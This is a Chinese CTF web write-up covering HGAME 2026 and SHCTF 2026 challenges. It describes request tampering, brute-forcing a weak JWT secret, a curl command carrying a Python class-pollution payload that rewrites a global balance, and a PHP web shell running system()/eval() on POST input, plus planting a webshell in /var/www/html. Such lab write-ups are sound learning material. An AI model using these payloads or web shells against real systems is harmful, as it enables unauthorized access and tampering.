HGAME-web2026-WP

Thu, 05 Mar 2026 18:35:35 +0800

魔理沙的魔法目录

题目描述：

这是魔理沙从帕秋莉的藏书中找来的一系列魔法书

她说, 如果你能阅读他们 1 个小时以上, 就会给你奖励!

直接抓包

看到时间直接改大放包，flag就出来了

hgame{YoU-4re_@1s0-4-m4Hou_T5Uk@I-NOwlf0b16}

Vidarshop

登录窗口进来是个商店，经典没钱买flag。

题目描述提示管理员账户可以管钱，登录处不能写特殊符号。

找半天原来是jwt

在这藏着

JWT弱密钥爆破结果为111，然而我们把role改成admin或者id改成admin没有卵用？

发现是uid的问题，注册几个账户发现uid规律

a,b,c,d…z对应1-26，数字直接对应，推出admin为1413914

终于登录为了admin，然后还是买不了。通过改包或者抢米都改不了余额

我们再看上图，uid 在 Header 里，使用POST /api/upadte，下面还有json大括号

所以尝试python原型链污染，在抢米的时候抓包得知变量叫balance

xiaochai_123@binarios:~$ curl -X POST "http://forward.vidar.club:30452//api/update" \
  -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiZXhwIjoxNzcyNzA4Nzg4fQ.BZjJ7f_603GwNzZFWxWCyY7R36PItLaB3wgqPHy3vKo" \
  -H "uid: 1413914" \
  -H "Content-Type: application/json" \
  -d "{\"__init__\": {\"__globals__\": {\"balance\": 2000000}}}"
{"is_admin":true,"msg":"System Access Granted","user_info":{"balance":2000000,"role":"user","username":"admin"}}
xiaochai_123@binarios:~$

现在我们就有钱直接买flag啦

博丽神社的绘马挂

随便登录就登录上了？然后是发帖系统，考察XSS

SHCTF-web2026-WP

Sun, 22 Feb 2026 18:35:35 +0800

SHCTF-3rd-Web-WP

Challenge Info - [

没钱起手，想买flag还缺47，看看源代码，发现提示

使用cyberchef解码拿到信息

说是有个shell.php，爆破一下看看有什么路径，（不小心把靶机扫爆了）根据提示我们来到这里

发现php代码

php

if (isset($_GET['show'])) {
    highlight_file(__FILE__);
}

$pass = 'c4d038b4bed09fdb1471ef51ec3a32cd';

if (isset($_POST['key']) && md5($_POST['key']) === $pass) {
    if (isset($_POST['cmd'])) {
        system($_POST['cmd']);
    } elseif (isset($_POST['code'])) {
        eval($_POST['code']);
    }
} else {
    http_response_code(404);
}

找出passwd，其md5是c4d038b4bed09fdb1471ef51ec3a32cd

只要passwd对了就拿到shell

用神秘小脚本爆破一下简单的字符集，看到源码是114514

进去之后没发现有什么flag，写个小马进去（这里我最开始把马写在tmp目录下，蚁剑无法连接，Web服务被限制了，所以我们要写在/var/www/html里面

ok,成功连接，看到它的钱数，我们给他改多就好了